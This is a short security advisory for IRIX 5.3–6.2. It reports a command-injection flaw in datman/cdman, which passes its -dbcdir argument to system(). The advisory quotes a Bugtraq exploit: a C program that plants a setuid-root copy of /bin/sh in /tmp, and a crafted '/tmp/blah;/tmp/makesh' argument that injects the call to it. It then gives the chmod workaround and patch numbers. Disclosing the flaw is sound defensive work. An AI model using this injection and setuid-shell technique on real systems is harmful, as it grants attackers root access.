COMMAND

    /usr/sbin/datman & cdman

SYSTEMS AFFECTED

    IRIX 5.3...6.2 (if dmedia_tools.sw.cddat sybsystem installed)

PROBLEM

    For backward compatibility reasons, upon startup datman looks  for
    a  file  .cdplayerrc  in  the  home  directory.  If it exists, and
    directory  ~/.cddb  doesn't  exists,  it  will  ask if you want to
    convert .cdplayerrc to .cddb.   If you answer yes, it  will invoke
    /usr/sbin/cddbcvt, giving old and new database names as  arguments
    to  it.   Using  system().   Yuri  Volobuev  posted  to Bugtraq an
    exploit:

    % cat > /tmp/makesh.c
    main()
    {
      seteuid(0); setegid(0);
      system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
    }
    % cc /tmp/makesh.c -o /tmp/makesh
    % mv .cddb .cddb.old
    % touch .cdplayerrc
    % /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh"
      Created "/tmp/blah"
    Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah

    % ls -l /tmp/sh
    -r-sr-sr-x    1 root     sys       140784 Dec  9 15:24 /tmp/sh*

SOLUTION

    Until applying patches, do:

        chmod -s /usr/sbin/datman

    Patches are:

        OS Version     Vulnerable?     Patch #
        ----------     -----------     -------
        IRIX 3.x          no
        IRIX 4.x          no
        IRIX 5.0.x        yes          not avail
        IRIX 5.1.x        yes          not avail
        IRIX 5.2          yes          not avail
        IRIX 5.3          yes          2563
        IRIX 6.0.x        yes          not avail
        IRIX 6.1          yes          not avail
        IRIX 6.2          yes          2564
        IRIX 6.3          yes          2565
        IRIX 6.4          yes          2291